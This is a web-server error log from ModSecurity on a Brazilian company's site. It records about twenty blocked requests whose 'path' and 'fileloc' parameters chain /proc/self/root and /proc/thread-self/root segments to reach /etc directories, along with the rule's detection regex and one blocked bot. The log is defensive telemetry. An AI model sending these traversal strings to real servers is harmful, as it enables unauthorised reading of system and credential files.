[Mon Mar 16 16:56:20.556240 2026] [:error] [pid 21805:tid 140411582465792] [client 74.7.243.203:41130] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhgZLABkC4fWIHEf8EIVgAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:56:26.238145 2026] [:error] [pid 21806:tid 140411683178240] [client 74.7.228.16:52806] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhgatSswJuvopo3lOh0JwAAAIc"]
[Mon Mar 16 16:56:31.307419 2026] [:error] [pid 29507:tid 140411691570944] [client 74.7.241.46:35518] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhgb0r9dMAiw-8KANNcUAAAAQY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:56:35.080804 2026] [:error] [pid 15568:tid 140411590858496] [client 74.7.241.46:38582] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhgc6QpVkWug9HeOt9KLgAAA1I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:56:36.119511 2026] [:error] [pid 10772:tid 140411624429312] [client 74.7.243.203:37984] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhgdP9ocpUE4ed4uDwHYgAAAg4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:56:36.561155 2026] [:error] [pid 15568:tid 140411674785536] [client 74.7.241.46:38588] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhgdKQpVkWug9HeOt9KLwAAA0g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:56:45.503152 2026] [:error] [pid 10772:tid 140411557287680] [client 74.7.243.203:58228] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhgff9ocpUE4ed4uDwHbAAAAhY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:56:47.962540 2026] [:error] [pid 15061:tid 140411557287680] [client 74.7.243.203:58952] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhgf6TCbgAP5jq5TehBbgAAAtY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:56:58.802187 2026] [:error] [pid 10651:tid 140411716749056] [client 74.7.241.46:38602] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhgirysWC90G-1nBrBYbwAAAYM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:57:00.105699 2026] [:error] [pid 10831:tid 140411699963648] [client 74.7.241.46:36362] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhgjI6lpbStxTqkSkt_ZwAAAkU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:57:01.266310 2026] [:error] [pid 21805:tid 140411683178240] [client 74.7.241.46:36368] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhgjbABkC4fWIHEf8EIZAAAAEc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:57:02.456015 2026] [:error] [pid 21805:tid 140411716749056] [client 74.7.243.203:58958] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhgjrABkC4fWIHEf8EIZgAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:57:03.758466 2026] [:error] [pid 21806:tid 140411548894976] [client 74.7.243.203:56086] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhgj9SswJuvopo3lOh0LwAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:57:06.044260 2026] [:error] [pid 21805:tid 140411725141760] [client 74.7.241.46:36384] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhgkrABkC4fWIHEf8EIagAAAEI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:57:33.391902 2026] [:error] [pid 29802:tid 140411624429312] [client 74.7.241.46:36396] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhgrc_BxrYCr4hPDw_-1gAAAc4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:57:34.789320 2026] [:error] [pid 29802:tid 140411582465792] [client 74.7.241.46:59084] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhgrs_BxrYCr4hPDw_-1wAAAdM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:57:36.055837 2026] [:error] [pid 29802:tid 140411691570944] [client 74.7.241.46:59092] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhgsM_BxrYCr4hPDw_-2QAAAcY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:57:37.415311 2026] [:error] [pid 14895:tid 140411699963648] [client 74.7.241.46:59104] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhgsVajLEzk2WiQ-10n3AAAAoU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:57:38.692912 2026] [:error] [pid 10651:tid 140411725141760] [client 74.7.241.46:52738] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhgsrysWC90G-1nBrBYegAAAYI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:57:39.885607 2026] [:error] [pid 10651:tid 140411607643904] [client 74.7.241.46:52744] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhgs7ysWC90G-1nBrBYfQAAAZA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:57:41.307491 2026] [:error] [pid 14895:tid 140411674785536] [client 74.7.241.46:52760] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhgtVajLEzk2WiQ-10n3QAAAog"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:57:44.312654 2026] [:error] [pid 15061:tid 140411540502272] [client 74.7.241.46:52768] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhguKTCbgAP5jq5TehBiQAAAtg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
